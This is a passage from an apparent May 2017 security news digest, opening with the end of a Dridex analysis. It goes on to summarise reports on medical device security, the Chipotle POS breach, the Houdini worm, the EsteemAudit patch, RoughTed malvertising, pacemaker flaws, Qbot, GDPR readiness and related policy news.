The developers of Dridex look for potential victims in Europe. Between January 1st and early April 2017, we detected Dridex activity in several European countries. The UK accounted for more than half (nearly 60%) of all detections, followed by Germany and France. At the same time, the malware never works in Russia, as the C&Cs detect the country via IP address and do not respond if the country is Russia.

Conclusion

In the several years that the Dridex family has existed, there have been numerous unsuccessful attempts to block the botnet’s activity. The ongoing evolution of the malware demonstrates that the cybercriminals are not about to bid farewell to their brainchild, which is providing them with a steady revenue stream. For example, Dridex developers continue to implement new techniques for evading the User Account Control (UAC) system. These techniques enable the malware to run its malicious components on Windows systems.

It can be surmised that the same people, possibly Russian speakers, are behind the Dridex and Zeus Gameover Trojans, but we do not know this for a fact. The damage done by the cybercriminals is also impossible to assess accurately. Based on a very rough estimate, it has reached hundreds of millions of dollars by now. Furthermore, given the way that the malware is evolving, it can be assumed that a significant part of the “earnings” is reinvested into the banking Trojan’s development.

The analysis was performed based on the following samples:

Dridex4 loader: d0aa5b4dd8163eccf7c1cd84f5723d48
Dridex4 bot: ed8cdd9c6dd5a221f473ecf3a8f39933


Insecure Medical devices are enlarging surface of attacks for organizations
27.5.2017 securityaffairs Cyber

A study conducted by the Ponemon Institute shows insecure Medical devices are enlarging the surface of attacks for organizations.
A study conducted by the Ponemon Institute, based on a survey of 550 individuals, shows that manufacturers and healthcare delivery organizations (HDO) are concerned about cyber attacks on medical devices.

67 percent of medical device makers and 56 percent of HDOs believe that in the next 12 months their medical devices will be targeted by hackers. Unfortunately, only 25 percent of device makers and 38 percent of HDOs believe the security features implemented in the devices can adequately protect patients and the clinicians who use them.

33% of the participants in the survey confirmed they were aware of effects of cyber attacks had a negative impact on patients. Hackers can power a wide range of attacks on the devices, including ransomware attacks, denial-of-service (DoS) attacks, and hijacking of medical devices.

The most disconcerting aspect of the research is that only 17 percent of device manufacturers and 15 percent of HDOs have adopted the necessary countermeasures to prevent attacks. 40 percent of HDOs and manufacturers admitted they haven’t adopted anything to prevent attacks.

Unsecured medical devices represent an entry point for hackers in hospitals and other healthcare organizations, the bad news is that the majority of the participant to the survey believe securing medical devices is very difficult.

The study revealed that security practices in place are not effective, manufacturers and HDOs lack of practices such as security testing throughout the SDLC, code review and debugging systems and dynamic application security testing. Surveyed organizations noticed 36 percent of manufacturers and 45 percent of HDOs do not test devices. Companies that tested the medical devices admitted finding vulnerabilities and even malware into their systems.

medical devices survey

“Medical device security practices in place are not the most effective. Both manufacturers and users rely upon following specified security requirements instead of more thorough practices such as security testing throughout the SDLC, code review and debugging systems and dynamic application security testing. As a result, both manufacturers and users concur that medical devices contain vulnerable code due to lack of quality assurance and testing procedures and rush to release pressures on the product development team.” states the report.

Another worrying data emerged with the survey is that budget increase are usually a consequence of a hacking attack.

“In many cases, budget increases to improve the security of medical devices would occur only after a serious hacking incident occurred. Device makers, on average, spend approximately $4 million on the security of their medical devices and HDOs spend an average of $2.4 million each year. As shown in Figure 9, a serious hacking incident or new regulations would influence their organizations to increase the security budget.” continues the report.


Chipotle Mexican Grill Fast-food chain notified customers a PoS malware breach
27.5.2017 securityaffairs Virus

The Fast-food chain Chipotle notified users a security breach, hackers compromised its point of sale terminals to steal payment card data.
The Mexican Grill Fast-food chain Chipotle notified users a data breach, hackers infected its point of sale terminals to steal payment card data.

The malicious code infected systems in 47 states and Washington earlier this year from March 24 to April 18.

The list of affected Chipotle restaurants is available here.

“The investigation identified the operation of malware designed to access payment card data from cards used on point-of-sale (POS) devices at certain Chipotle restaurants between March 24, 2017 and April 18, 2017.” reads the data breach notification published by the company. “The malware searched for track data (which sometimes has cardholder name in addition to card number, expiration date, and internal verification code) read from the magnetic stripe of a payment card as it was being routed through the POS device. There is no indication that other customer information was affected.”

Chipotle data breach

The company highlighted that not all the locations were breached by hackers, you can check a specific location at the following address:

https://www.chipotle.com/security#security

Users who have paid at the compromised stores should stay vigilant on their bank accounts and check any transaction involving their payment card.

The company confirmed to have removed the malicious code from the infected systems.

“During the investigation we removed the malware, and we continue to work with cyber security firms to evaluate ways to enhance our security measures. In addition, we continue to support law enforcement’s investigation and are working with the payment card networks so that the banks that issue payment cards can be made aware and initiate heightened monitoring.” reads the statements.

PoS systems attacks are very common, this week Target, the US retail giant that suffered one of the most severe PoS system attacks, has entered a settlement with the US Attorneys General and it has agreed to pay $18.5 million over the 2013 data breach.


Experts tracked a German hacker behind the spreading of Houdini Worm on Pastebin
27.5.2017 securityaffairs Virus

Security experts at Recorded Future tracked a German hacker for the propagation of the Houdini worm through Pastebin sites.
A German hacker that goes online with the moniker Vicswors Baghdad is the responsible for the propagation of the Houdini malware on Pastebin sites.

According to the expert at Recorded Future, the same threat actor appears to be the author of an open source ransomware variant called MoWare H.F.D.

Experts at Recorded Future have observed three distinct spikes in malicious Visual Basic scripts posted on paste sites, in August, October, and in March 2017.

houdini worm paste bin

Most of the scripts are used to spread the Houdini worm, a threat that first appeared in 2013 and was updated in 2016.

“In early March 2017, we began to notice an increasing number of malicious VBScripts posted to paste sites. The majority of these VBScripts appeared to be Houdini. Houdini is a VBScript worm that first appeared in 2013 and was updated in 2016.” states the analysis published by Recorded Future. “The individual(s) reusing this Houdini VBScript are continually updating with new command and control servers. After further defining our search criteria, we isolated the Houdini scripts and quickly identified three distinct spikes around August, October, and March of this year.”

Recorded Future discovered 213 malicious posts to Pastebin sites, involving a single domain with 105 subdomains, the experts have found 190 hashes.

The domains and subdomains are from a dynamic DNS provider, the attribution was impossible because threat actors published the VBScript for the Houdini worm on guest accounts.

However, the experts were able to determine the name of the registrant for one domain, microsofit[.]net, it is “Mohammed Raad,” and the associated email is“vicsworsbaghdad@gmail.com,” from “Germany.”

Googling the above information, the researchers discovered a Facebook profile using the identical information. According to the profile, Mohammed Raad is a member of a German cell of Anonymous, it uses Vicswors Baghdad as an alias.

The researchers also highlighted that the Facebook profile also includes a recent conversation related to the MoWare H.F.D ransomware.

houdini worm paste bin

“The Facebook profile displays a recent conversation pertaining to an open source ransomware called “MoWare H.F.D”. It appears that they are studying, testing, and possibly configuring a ransomware.” continues the analysis.

“Upon further inspection of the screenshot posted on the “vicsworsbaghdad” Facebook profile, we noticed that the ransomware being configuring is an open source version available by commenting on the creator’s YouTube video. An account “Vicswors Baghdad” commented asking where he can find the file to download, to which the developer commented that they sent a private message. The account “Vicswors Baghdad” uses the same email “vicsworsbaghdad@gmail.com” as the registration of microsofit[.]net.”

Further details, including the threat actor profile, are available in the post published by Recorded Future.


Organizations Concerned About Medical Device Attacks: Study

27.5.2017 securityweek Cyber

Many manufacturers and healthcare delivery organizations (HDO) are concerned about medical device attacks, but only few have taken significant steps to address the threat, according to a study commissioned by electronic design automation solutions provider Synopsys.

The study, based on a survey of 550 individuals conducted by the Ponemon Institute, shows that 67 percent of medical device makers and 56 percent of HDOs believe an attack on the medical devices they build or use is likely to occur in the next 12 months.

In fact, roughly one-third of respondents said they were aware of cyber incidents that had a negative impact on patients, including inappropriate therapy or treatment delivery, ransomware attacks, denial-of-service (DoS) attacks, and hijacking of medical devices.

On the other hand, only 17 percent of device manufacturers and 15 percent of HDOs have taken significant steps to prevent attacks. Roughly 40 percent on both sides admitted that they haven’t done anything to prevent attacks.

Only 25 percent of device makers and 38 percent of HDOs are confident that the security mechanisms built inside devices can adequately protect patients and the clinicians who use these systems.

While mobile devices help clinicians be more efficient, approximately half of respondents believe that their use in hospitals and other healthcare organizations significantly increases security risks.

A majority of respondents believe securing medical devices is very difficult. The survey showed that many focus on security requirements instead of more efficient practices, such as security testing throughout the development lifecycle, code review, and dynamic testing.

The study shows that more than half of device manufacturers and HDOs blame the presence of vulnerable code on lack of quality assurance and testing procedures, while nearly 50 percent also blame the rush-to-release pressure on the development team, accidental coding errors, and lack of training on secure coding practices.

The study shows that 36 percent of manufacturers and 45 percent of HDOs do not test devices. Some of those that do test have admitted finding vulnerabilities and even malware.

While medical device manufacturers are most concerned about hacker attacks and the challenges posed by securing new medical technologies, service providers are more concerned about keeping up with regulatory requirements, and the medical industry’s lack of protection for patients and users.

When it comes to budget, a majority believe a serious hacking incident affecting medical devices would likely lead to a budget increase. A significant percentage of respondents also believes new regulations would also influence budget.

Budget influence factors


Researchers Release Patch for NSA-linked "EsteemAudit" Exploit

27.5.2017 securityweek BigBrothers
Security researchers at enSilo have released a patch to keep vulnerable systems protected from a recently released Windows exploit allegedly used by the National Security Agency (NSA)-linked Equation Group.

Dubbed EsteemAudit, this exploit targets a remote desktop protocol (RDP) bug and can be abused to move laterally within a compromised organization’s network, as well as to infect victims with ransomware or backdoors, or to exfiltrate sensitive information.

The exploit might not be as popular as the EternalBlue exploit, which fueled large infections such as WannaCry or Adylkuzz, but it could prove as devastating.

EsteemAudit was made public last month when the hacking group known as the Shadow Brokers decided to release a new set of exploits and tools allegedly stolen from the NSA-linked Equation Group last year. Soon after, Microsoft said the vulnerabilities had been patched in March.

The hackers initially put the tools up for auction, but decided to release some of them for free after failing to attract buyers. Last week, the Shadow Brokers announced plans to launch a subscription service and share more exploits to members for a monthly fee.

Unlike EternalBlue, which affects a variety of Windows versions, EsteemAudit only works on Windows XP and Windows Server 2003, which supposedly limits its overall impact. However, this also means that an official patch is unlikely to arrive from Microsoft, as it no longer offers support for these platform iterations.

Because of that, enSilo decided to release a persistent patch for these systems and keep users safe from attacks possibly leveraging the exploit. The decision was fueled by the fact that a large number of machines continue to use Windows XP and Server 2003, the researchers say.

“Upon login for each session, Windows will create a new instance of winlogon. The patch will be loaded into winlogon.exe (only if it is an RDP session) to perform in memory patching (hotpatching) of EsteemAudit. Any attempt to use EsteemAudit to infect the patched machine will inevitably fail,” enSilo explains.

Installing this patch, however, doesn’t render Windows XP or Server 2003 systems fully secure, as hundreds of other vulnerabilities impacting them still exist and will never be patched. This patch resolves only the vulnerability exploited by EsteemAudit and works on both x86 and x64 platform versions.

The patch is available for download on enSilo’s website and is installed by an installation program after accepting the terms of usage. Uninstallation is supported by signaling an event (which will remove the patch in memory) and unregistering the patch from loading into subsequent RDP sessions.

“The patch for Windows XP and Server 2003 supports silent installation and does not require a reboot, which helps users avoid the required downtime typically associated with patch installations. Upon patching, any attempt to use an EsteemAudit exploit to infect a patched machine will inevitably fail,” the researchers say.


Large Malvertising Campaign Delivers Array of Payloads

27.5.2017 securityweek Virus
A malvertising campaign that has been active for more than a year is using fingerprinting to target users with a variety of payloads, Malwarebytes security researchers warn.

Dubbed RoughTed, this large malvertising operation peaked in March 2017, with its domains accumulating over half a billion visits in the past 3 months alone. Unique to it is the fact that it has a broad scope, ranging from scams to exploit kits, and that it delivers payloads based on user’s operating system, browser, and geolocation.

The campaign also uses effective techniques to triage visitors and bypass ad-blockers, which explains the large success it has seen so far. RoughTed’s operators have been using the Amazon cloud infrastructure, particularly the Content Delivery Network (CDN) and multiple ad redirections from several ad exchanges, the security firm says.

With traffic coming from thousands of publishers, some of which are ranked in Alexa’s top 500 websites, the campaign blended in and made it more difficult to identify the source of malvertising, Malwarebytes’ Jérôme Segura reveals.

Upon initial detection, the campaign was redirecting to the Magnitude exploit kit, but started redirecting to the RIG exploit kit just days later. The researchers then identified the same pattern on a hundred other domains, most of which he says were purchased through registrar EvoPlus in small batches with a new .ru or .ua email address each time.

While analyzing the traffic for the RoughTed campaign, Segura discovered that the bulk of it was coming from video or file sharing sites closely intertwined with URL shorteners. These sites enjoy high traffic but have low standards when it comes to quality and safety of online advertising, Segura points out.

The campaign was also associated with an ad code script from advertising company Ad-Maven, which webmasters knowingly integrated into personal websites for monetization purposes. The script contains an algorithm to generate future Amazon S3 URLs, though buckets are created only for the next 3-5 days.

The code also stands out due to its fingerprinting functionality and the use of a technique called ‘canvas fingerprinting’. “The point is to profile users with great granularity and identify those that may be cheating the system by lying about their browser or geolocation,” the researcher explains.

What’s more, the redirections to RoughTed domains were found to happen even when ad-blockers such as Adblock Plus, uBlock origin or AdGuard were used. In an incident involving Google Chrome, the researcher found that the browser hijacking took place as soon as the user clicked anywhere on the first visited page.

“This malvertising campaign is quite diverse and no matter what your operating system or browser are, you will receive a payload of some kind. Perhaps this should be something for publishers to have a deep hard look at, knowing what they may be subjecting their visitors to if they decide to use those kinds of adverts,” the researcher says.

As part of the campaign, users were tricked with a fake Flash Player update that targets Mac, or with a bogus Java update for Windows, which instead is laced with adware. Bogus Chrome extensions are also part of it, leveraging the popularity of the browser, along with undesired redirections to iTunes/app store, tech support scams, or surveys and other scams.

The RoughTed campaign also redirected to exploit kits, mainly when it came to users in the US and Canada, but also those in the U.K., Italy, Spain, and Brazil. Used exploit kits included RIG, which in turn served the Ramnit banking Trojan, along with Magnitude, which eventually dropped the Cerber ransomware onto compromised systems.


G7 Demands Internet Giants Crack Down on Extremist Content

27.5.2017 securityweek BigBrothers
Taormina, Italy - The G7 nations on Friday demanded action from internet providers and social media firms against extremist content online, vowing to step up their fight against terrorism after the Manchester attack.

"The G7 calls for Communication Service Providers and social media companies to substantially increase their efforts to address terrorist content," Britain, the United States and their G7 partners said in a statement.

"We encourage industry to act urgently in developing and sharing new technology and tools to improve the automatic detection of content promoting incitement to violence, and we commit to supporting industry efforts in this vein including the proposed industry-led forum for combating online extremism," they said.

Elders at the Manchester mosque where the bomber sometimes worshipped have insisted that they preached a message of peace.

It has been suggested that he may well have been radicalized online by accessing content that is freely available from the likes of the Islamic State group.

"Make no mistake: the fight is moving from the battlefield to the internet," Prime Minister Theresa May told her G7 colleagues.

The G7 also vowed a collective effort to track down and prosecute foreign fighters dispersing from theaters of conflict such as Syria.

One prosecution was recently brought against such a fighter in Turkey, and Britain now wants help from local authorities for more prosecutions in Lebanon, Jordan and Iraq, a British government spokesperson said as the G7 countries met in Sicily.

The stepped-up cooperation comes amid fears that the Manchester bomber had been to Syria after visiting his parents' homeland of Libya.

"It is vital we do more to cooperate with our partners in the region to step up returns and prosecutions of foreign fighters," May said as she chaired a discussion on counter-terrorism in the Sicilian resort of Taormina.

"This means improving intelligence-sharing, evidence gathering and bolstering countries' police and legal processes."

European authorities are increasingly concerned about the threat posed by foreign fighters who went to join the Islamic State group but are now dispersing as the group comes under pressure on the battlefield.

According to a senior British government source, May urged the G7 countries to share police expertise and border security methods with countries where foreign fighters travel through or fight in.

Names and nationalities of foreign fighters should be shared to help their identification by different countries as they cross borders.

"When our allies find evidence, such as video or papers, of illegal activity involving foreign fighters, for example a Brit in a conflict zone, they should pass that to our authorities. It may help prosecute foreign fighters when they return," the source said.


Draft Hacking Back Bill Gets Modifications Prior to Imminent Introduction

26.5.2017 securityweek Hacking
Rep. Tom Graves (R-Ga.) has released an updated version (PDF) of his draft Active Cyber Defense Certainty (ACDC) Act, incorporating feedback from the business community, academia and cybersecurity policy experts. "I look forward to continuing the conversation and formally introducing ACDC in the next few weeks," he said yesterday.

The original discussion draft was released in March 2017.

ACDC is designed to amend the existing Computer Fraud and Abuse Act (CFAA). CFAA, enacted in 1986, currently prohibits individuals from taking any defensive actions other than preventative actions; that is, cyber defenders are only legally allowed to defend passively. ACDC would allow controlled 'active' defense -- something often called, somewhat misleadingly, 'hacking back' -- by excluding prosecution for the exempted actions under the CFAA.

The modifications now introduced are largely designed to tighten control and avoid collateral damage. For example, entities using active-defense techniques will need to report to the FBI. "A victim who uses an active cyber defense measure... must notify the FBI National Cyber Investigative Joint Task Force prior to using the measure."

Similarly, modifications make it clear that active defense restrictions against causing physical injury include financial injury; and provide additional safeguards for 'intermediate computers'. The latter term is defined as "a person or entity's computer that is not under the ownership or control of the attacker but has been used to launch or obscure the origin of the persistent cyber-attack."

These intermediate computers have always been considered the weak point in any form of hacking back -- it is not easy for anyone to be certain of the precise source of an attack, leading to the possibility that active-defense measures could be launched against an innocent target.

National Security Agency and Cyber Command head Admiral Mike Rogers is one of those with such concerns. "My concern is," he said during testimony before a House Armed Services subcommittee on Tuesday, "be leery of putting more gunfighters out in the street in the Wild West. As an individual tasked with protecting our networks, I'm thinking to myself -- we've got enough cyber actors out there already."

Perhaps in recognition of the inherent difficulties in such an Act, Graves has also introduced a sunset clause: "The exclusion from prosecution created by this Act shall expire 2 years after the date of enactment of this Act."

"Although ACDC allows a more active role in cyber defense," says an associated statement released yesterday, "it protects privacy rights by prohibiting vigilantism, forbidding physical damage or destruction of information on anyone else's computer, and preventing collateral damage by constraining the types of actions that would be considered active defense."


Survey Shows Disparity in GDPR Preparedness and Concerns

26.5.2017 securityweek Privacy
The European General Data Protection Regulation will take effect in exactly one year from today. It will affect any company that does business with the EU, whether that company is based in Europe or elsewhere (such as the US). While there have been many surveys indicating that affected firms are far from prepared, there are few that highlight the geographic disparity in readiness.

One Year Out: Views on GDP (PDF), conducted by Vanson Bourne for Varonis, is particularly detailed. It surveyed 500 IT decision makers in organizations with more than 1,000 employees in the US (200), the UK (100), Germany (100) and France (100). Unlike many such surveys, it includes the raw data, allowing readers to dig deep into areas of interest or concern.

Unsurprisingly, given other surveys, the headline result is that 75% of respondents "face serious challenges in being compliant with the EU GDPR by 25th May 2018." This result is consistent across all four nations; but those who strongly agree range from 15% in the UK (the lowest) to 25% (the highest) in the US.

The cause of this disparity may be found in senior management's attitude towards GDPR. Overall, 42% of companies do not view compliance by the deadline as a priority. Thirteen percent of firms 'strongly agree' with this -- but the detail ranges from just 6% in the UK to 19% in the US (France and Germany are equal at 10%).

It is tempting to suggest that this is influenced by history: the UK regulator has traditionally been 'business-friendly', allowing companies to be more relaxed towards data protection than counterparts in France and Germany. US companies (apart from the major tech industries such as Google, Facebook and Microsoft), have little experience of European regulators.

But while the survey may indicate a lack of urgency at the management level, the respondents themselves indicate serious concern over the potential effect of GDPR. Overall, 75% of respondents believe that fines imposed for breaching regulations could cripple some organizations. Here, US concerns (81%) are above average, with France being the least concerned at 64%. It would appear that US practitioners are more concerned about GDPR than are their managers.

The survey also provides detail on what aspects of GDPR are most concerning. Not surprisingly, the erasure right (the right-to-be-forgotten) in Article 17 tops the list at 55% overall. Somewhat surprisingly given the apparent link between this and the American constitutional right to freedom of speech, the US respondents were the least concerned at 48%. Equally surprising, UK concern was by far the highest at 71%.

The second biggest concern is the requirement for processing activities, contained in Article 30; that is, visibility into and control over who has access to the data. Overall concern was steady at 52%, with regional variations limited to the lowest at 50% (UK) and the highest at 53% (US).

"What's most worrying about the findings," comments Matt Lock, director of sales engineers at Varonis, "is that one in four organizations doesn't have a handle on where its sensitive data resides. These companies are likely to have a nasty wake-up call in one year's time. If they don't have this fundamental insight into where sensitive data sits within their organizations and who can and is accessing it, then their chances of getting to first base with the regulations are miniscule and they are putting themselves firmly at the front of the queue for fines.”

The concern showing the greatest disparity is over data protection by design (Article 25). The least concern comes from France at 35%, with the highest from the US at 55% (this is the highest of all concerns for the US respondents). It seems to reflect a general concern that GDPR might impinge on innovation -- with the highest concern coming from perhaps the most entrepreneurial nation.

It would be wrong, however, to think that the respondents have only negative thoughts and worries about GDPR. Thirty-six percent of respondents believe it will be very beneficial for both consumers and organizations. This, however, ranges from a very low 12% in the UK to an encouraging 47% in the US. In purely business terms, 57% of UK respondents believe it will prove troublesome for organizations, while only 36% of US respondents think the same.

The top benefit for private citizens is that their personal data will be better protected (54%). The UK (61%) and the US (59%) lead France (45%) and Germany (47%) in this. The order is reversed, however, over whether GDPR will make it less likely that PII will be passed to third parties. The UK (24%) and the US (32%) are behind both France (35%) and Germany (36%). Confirming these views, very few respondents could see no benefits from GDPR -- and most of those seem to be in the UK (11%). Only 5% of US organizations hold a similar view.

A particularly interesting section of the report deals with expected outcomes from the GDPR, with wide variations on which regulator is expected to be the most stringent. Overall, Germany tops the list at 76%, with German respondents in the lead at 85%. The UK is second overall at 57% -- which could be surprising given the UK regulator's soft historical approach and the UK government's insistence that it will implement GDPR in as business-friendly manner as possible. This view is distorted, however, by the UK and US respondents' score at 76% each. France (35%) and Germany (24%) are far less confident that the UK regulator will be rigorous.

Ninety-two percent of respondents suspect a particular industry will be singled out as an example in the event of a breach. Banking is seen as the most likely at 26% overall. This figure is distorted by the UK response at 52%. Both France and Germany individually believe that any example will more likely come from the technology and telecommunications industry.

A high number of respondents (82%) also believe that a particular country will be singled out if one of their organizations is in breach of GDPR. The overall favorite is the UK at 23% -- but this is distorted by the UK respondents (48%) who are perhaps concerned with the after effects of Brexit. Noticeably, only 2% of French and 11% of German respondents have a similar view.

Nevertheless, 68% of respondents believe that a UK company (as opposed to the UK in general) will be singled out and punished because of Brexit. This belief is most strong in the US (77%) and the UK (70%), and less so, but still high, in France (58%) and Germany (57%).

What this survey shows above all is that while there is a general lack of preparedness for GDPR among most organizations, specific concerns and expectations can vary widely between the different nations. The level of detail provided goes far beyond many similar surveys, and allows individual readers to dig deeper into specific areas. The value in this is that by evaluating other countries' and organizations' concerns, individual readers can rate their own preparedness.


Endpoint Security Firm Tanium Raises $100 Million

26.5.2017 securityweek Security
Emeryville, CA-based endpoint security and systems management firm Tanium announced on Thursday that it has raised $100 million through the sale of common stock.

The latest funding round was led by TPG Growth and it brought in a new investor. The $100 million raised through the issuance of common stock – previous funding rounds offered only preferred stock – brings the company’s value to $3.75 billion.

Part of the proceeds have been used to repurchase shares from David Hindawi, co-founder and executive chairman of Tanium, to allow him to fund his charity projects. The rest will be used to provide liquidity to early employees and investors, and for general corporate purposes.

Tanium raises $100 million

With this funding round, Tanium has raised a total of $407 million. The company reported a revenue growth of more than 100% last year, and it claims to have brought on board nearly 100 new enterprise customers. Clients include U.S. government agencies, 12 of the top 15 banks, and six of the top 10 retailers.

The company’s plans for the future include expansion in the EMEA and APAC regions, establishing a strong presence in the media and manufacturing sectors, further investment into IT operations products and modules, and growth in existing industries.

“Tanium is unique in our industry. In contrast to the cybersecurity-only companies, we provide an endpoint platform that allows communication for massive numbers of assets in a way enterprises have never had before, which is useful across not only security but also operations issues in IT,” said Tanium CEO Orion Hindawi.

“Because of that breadth of offering, our investors see Tanium having longevity and potential that exceeds the typical cybersecurity landscape, and we will work hard to continue proving them right by driving our platform further into both security and operations with each passing quarter,” he added.

Last month, Hindawi published an open letter addressing accusations that the company exposed a California hospital’s network during sales demos, and reports of a toxic staff relations culture.


Russia's Disinformation Efforts Hit 39 Countries: Researchers

26.5.2017 securityweek BigBrothers
Russia's campaign of cyberespionage and disinformation has targeted hundreds of individuals and organizations from at least 39 countries along with the United Nations and NATO, researchers said Thursday.

A report by the Citizen Lab at the University of Toronto revealed the existence of "a major disinformation and cyber espionage campaign with hundreds of targets in government, industry, military and civil society," lead researcher Ronald Deibert said.

The findings suggest that the cyber attacks on the 2016 presidential campaign of Hillary Clinton -- which US intelligence officials have attributed to Russia -- were just the tip of the iceberg.

Citizen Lab researchers said the espionage has targeted not only government, military and industry targets, but also journalists, academics, opposition figures, and activists,

Notable targets, according to the report, have included a former Russian prime minister, former high-ranking US officials, members of cabinets from Europe and Eurasia, ambassadors, high ranking military officers and chief executives of energy companies.

In a blog post, Deibert said the Russian-directed campaign follows a pattern of "phishing" attacks to obtain credentials of targets, and carefully "tainted" leaks that mix real and false information to create confusion around the true facts.

"Russia has a long history of experience with what is known as 'dezinformatsiya,' going back even to Soviet times," Deibert said.

"Tainted leaks, such as those analyzed in our report, present complex challenges to the public. Fake information scattered amongst genuine materials -- 'falsehoods in a forest of facts'... is very difficult to distinguish and counter, especially when it is presented as a salacious 'leak' integrated with what otherwise would be private information."

Deibert said the researchers had no "smoking gun" that links the campaign to a particular government agency but added that "our report nonetheless provides clear evidence of overlap with what has been publicly reported by numerous industry and government reports about Russian cyber espionage."

Citizen Lab said one of the targets was US journalist David Satter, who has written extensively on corruption in Russia.

Satter's stolen e-mails were "selectively modified," and then "leaked" to give the false impression that he was part of a CIA-backed plot to discredit Russian President Vladimir Putin, the report said.

Similar leak campaigns targeted officials from Afghanistan, Armenia, Austria, Cambodia, Egypt, Georgia, Kazakhstan, Kyrgyzstan, Latvia, Peru, Russia, Slovakia, Slovenia, Sudan, Thailand, Turkey, Ukraine, Uzbekistan and Vietnam, according to the report.

UN officials and military personnel from more than a dozen countries were also targets, Citizen Lab said.

"Our hope is that in studying closely and publishing the details of such tainted leak operations, our report will help us better understand how to recognize and mitigate them," Deibert said.


Thousands of Third-Party Library Flaws Put Pacemakers at Risk

26.5.2017 securityweek Vulnerebility
Researchers have conducted a detailed analysis of pacemaker systems from four major vendors and discovered many potentially serious vulnerabilities.

The fact that implantable cardiac devices such as pacemakers and defibrillators are vulnerable to hacker attacks has been known for years, and while steps have been taken to address issues, security experts still report finding flaws in these products.

WhiteScope, a company founded by Billy Rios, one of the first security researchers to analyze medical devices, recently conducted an analysis of the implantable cardiac device ecosystem architecture and implementation interdependencies, with a focus on pacemakers.

Pacemaker vulnerabilities

The analysis covered home monitoring systems, implantable devices, pacemaker programmers, and the patient support networks of four vendors. Researchers investigated each type of device and the communications between them.

Tests conducted on devices acquired from eBay showed that reverse engineering their firmware is made easy by the fact that many of them use commercial, off-the-shelf microprocessors.

In the case of home monitoring devices, researchers discovered data sheets publicly available on the Internet, allowing attackers to determine how they work and how they can be manipulated. Firmware reverse engineering is also made easy by the lack of packing, obfuscation and encryption.

Debugging functionality present in implanted devices also exposes firmware. Malicious actors could leverage these features to gain privileged access to home monitoring devices and the pacemaker programmers used by physicians to diagnose and program the actual cardiac devices.

WhiteScope has analyzed four pacemaker programmers and found that they use more than 300 third-party libraries. Of these components, 174 are known to have a total of more than 8,000 vulnerabilities.

“Despite efforts from the FDA to streamline routine cybersecurity updates, all programmers we examined had outdated software with known vulnerabilities,” Rios said in a blog post. “We believe that this statistic shows that the pacemaker ecosystem has some serious challenges when it comes to keeping systems up-to-date. No one vendor really stood out as having a better/worse update story when compared to their competitors.”

In some cases, researchers found unencrypted patient data stored on the programmers, including SSNs, names, phone numbers and medical information. Since these programmers typically use removable storage drives, it’s easy for a local attacker to mount the drive and extract the entire file system.

Another potential problem is the fact that programmers do not require any type of authentication for programming implantable cardiac devices.

The list of security holes found by experts in home monitoring devices includes the failure to map the firmware to protected memory, firmware updates not digitally signed or protected against man-in-the-middle (MitM) attacks, hardcoded credentials, unsecured external USB connections, and the usage of universal authentication tokens for pairing with the implanted device.

The vendors have not been named and the details of the vulnerabilities found by WhiteScope have not been disclosed to the public, but they have been reported to ICS-CERT, which will likely alert affected companies.


Nigerians Sentenced to Prison in U.S. Over Massive Fraud Scheme

26.5.2017 securityweek Crime
Three Nigerian nationals have been handed prison sentences totaling 235 years by a U.S. court for their role in a massive international online scheme that involved romance scams, identity theft, fraud and money laundering.

The suspects, extradited to the United States from South Africa in July 2015, are Oladimeji Seun Ayelotan, 30, who was sentenced to 95 years in prison, Rasaq Aderoju Raheem, 31, who was sentenced to 115 years, and Femi Alexander Mewase, 45, who received a 25-year sentence.

They were found guilty in early 2017 of committing mail fraud, wire fraud, credit card fraud, identity theft, and theft of government property. Two of them were also found guilty of conspiracy to commit bank fraud and money laundering.

U.S. authorities have charged 21 individuals in this case, including from Nigeria, South Africa, Wisconsin, California and New York. Eleven members of the conspiracy have been sentenced, including Teslim Olarewaju Kiriji, a 30-year-old Nigerian man believed to be one of the leaders of the conspiracy. Kiriji was sentenced to 20 years in prison, while the others received 10 years or less. Many of the remaining suspects have already pleaded guilty to various charges.

According to the Department of Justice, the defendants have been involved in Internet scams since at least 2001, with intended losses totaling tens of millions of dollars.

The scheme often started with a romance scam targeting U.S. citizens, who were tricked into believing that they were in a romantic relationship with a persona made up by the scammers.

Once they gained the victim’s trust, the perpetrators asked them to send money or help carry out various activities, such as laundering money via Western Union and MoneyGram, cashing counterfeit checks, and reshipping items purchased with stolen credit cards. The scammers also used stolen personal information to take control of bank accounts.

Authorities have published a list of email addresses and names used in this operation, urging other potential victims to come forward.


Qbot Infects Thousands in New Campaign

26.5.2017 securityweek BotNet
A recent distribution campaign resulted in thousands of machines being infected with the Qbot malware, Cylance security researchers warn.

Qbot, which is also known as Qakbot or Quakbot, has been around since 2009, but multiple layers of obfuscation, server-side polymorphism and periodic improvements allow it to remain a persistent threat.

The malware is known for its credential stealing functionality and the ability to spread through network shares, but also includes backdoor capabilities. For two weeks in February last year, the threat managed to ensnare over 50,000 computers worldwide into a botnet. In July, a SentinelOne report on the Furtim-related SFG malware tied Qbot to a fast-flux proxy-based network called Dark Cloud or Fluxxy.

What’s unclear regarding the newly observed Qbot outbreak is how the malware managed to infect such a large number of machines in a short period of time. Most probably, Cylance says, updated exploit kits helped with the distribution.

The core functionality of Qbot has remained fairly consistent over the years, and the polymorphic nature of the threat helped it evade detection. Focusing on this aspect allowed the researchers to discover how often the executable code is modified.

The same as with previously observed samples, the malware continues to configure a scheduled task to request updates, with one command set to run on a weekly basis. The payload received from the server is encrypted, and “the first 20 bytes serve as the RC4 key to decrypt the data,” the security researchers say.

By creating a script to send HTTP requests to each of the three URLs the malware itself receives updates from, the security researchers discovered that files with a unique hash would be supplied every 10 minutes. They also managed to collect a total of 140 unique files supplied by the server over a period of 24 hours.

“All 141 downloaded files were 32-bit Windows executables. Across the 141 files, all have unique compile timestamps, and the earliest one occurred on May 15, 2017,” the researchers say.

Analyzing two files with the same import hash but with different file hashes revealed that, of nine PE sections each of them contains (.text, .code, .rdata, .data, .CRT, .exp, .code (again), .rsc, and .reloc), all section hashes match except those for .text, .rdata, and .data.

Different .text sections could reveal a change in executable code, and initial analysis revealed that all 27 functions identified matched 100%. Following deobfuscation, however, the security researchers discovered that nine functions had received some changes, albeit the overall Qbot functionality remained the same.

“Qakbot continues to be a significant threat due to its credential collection capabilities and polymorphic features. Unhindered, this malware family can rapidly propagate through network shares and create an enterprise-wide incident,” Cylance notes.

In an emailed comment to SecurityWeek, Michael Patterson, CEO of Plixer, pointed out that there is no shortage of vulnerabilities that malicious applications can exploit and that threats will continue to evolve. Thus, defense systems should adapt to ensure more efficient detection.

